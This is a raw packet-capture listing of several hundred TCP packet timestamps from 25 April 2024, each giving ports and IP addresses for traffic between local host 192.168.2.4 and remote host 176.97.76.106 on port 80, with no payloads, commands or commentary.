                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.787879944 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.787913084 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.787929058 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.787962914 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788006067 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788024902 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788067102 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788079023 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788124084 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788197041 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788208961 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788218975 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788237095 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788254023 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788259029 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788271904 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788290977 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788347960 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788360119 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788388968 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788400888 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788423061 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788466930 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788469076 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788527966 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788569927 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788614988 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788640022 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788702011 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788749933 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788775921 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788819075 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788876057 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788887978 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788928986 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788958073 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788970947 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.788999081 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789011002 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789052963 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789064884 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789096117 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789176941 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789189100 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789200068 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789222956 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789242983 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789266109 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789324045 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789359093 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789376020 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789377928 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789400101 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789416075 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789443016 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789454937 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789530039 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789531946 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789541960 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789606094 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789617062 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789638996 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789638996 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789653063 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789678097 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789695024 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789726973 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789737940 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789778948 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789808035 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789819956 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789839029 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789855003 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789865971 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789927959 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789940119 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789947033 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789949894 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789993048 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.789994955 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790005922 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790021896 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790045977 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790064096 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790091991 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790105104 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790150881 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790155888 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790180922 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790209055 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790216923 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790229082 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790271044 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790314913 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790314913 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790318012 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790342093 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790364981 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790405989 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790411949 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790441990 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790488005 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790496111 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790544987 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790553093 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790565014 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790594101 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790612936 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790628910 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790677071 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790704012 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790718079 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790762901 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790769100 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790795088 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790807009 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790867090 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790898085 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790941954 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.790981054 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791017056 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791017056 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791021109 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791034937 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791105032 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791110039 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791151047 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791197062 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791229963 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791280985 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791328907 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791348934 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791380882 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791511059 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791518927 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791594028 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791609049 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791620970 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791635036 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791661024 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791681051 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791698933 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791713953 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791726112 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791740894 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791780949 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791795015 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791801929 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791816950 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791829109 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791867018 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791867018 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791887999 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791914940 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791944981 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791965008 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.791975975 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792018890 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792022943 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792074919 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792121887 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792175055 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792187929 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792197943 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792268991 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792279005 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792282104 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792294025 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792304993 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792339087 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792339087 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792376041 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792390108 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792409897 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792433023 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792448997 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792453051 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792479038 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792530060 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792550087 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792565107 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792577028 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792608976 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792623043 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792665005 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792685986 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792711020 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792761087 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792773008 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792781115 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792829990 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792853117 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792864084 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792877913 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792890072 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792913914 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792933941 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.792933941 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793001890 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793014050 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793062925 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793071032 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793073893 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793086052 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793103933 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793128014 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793133020 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793144941 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793168068 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793184996 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793235064 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793293953 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793332100 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793337107 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793375015 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793402910 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793459892 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793515921 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793534040 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793579102 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793590069 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793631077 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793643951 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793715954 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793728113 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793762922 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793766975 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793798923 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793833017 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793881893 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793917894 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793924093 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.793936014 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794006109 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794008017 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794017076 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794055939 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794064045 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794110060 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794114113 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794126987 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794240952 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794270039 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794379950 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794424057 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794455051 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794467926 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794492006 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794502020 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794517994 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794558048 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794624090 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794636965 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794676065 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794677973 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794691086 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794713020 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794744968 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794778109 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794819117 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794836044 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794882059 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794922113 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794934034 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794953108 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794991970 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.794994116 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.795046091 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.795084000 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.795192003 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.795228004 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.795280933 CEST8049733176.97.76.106192.168.2.4
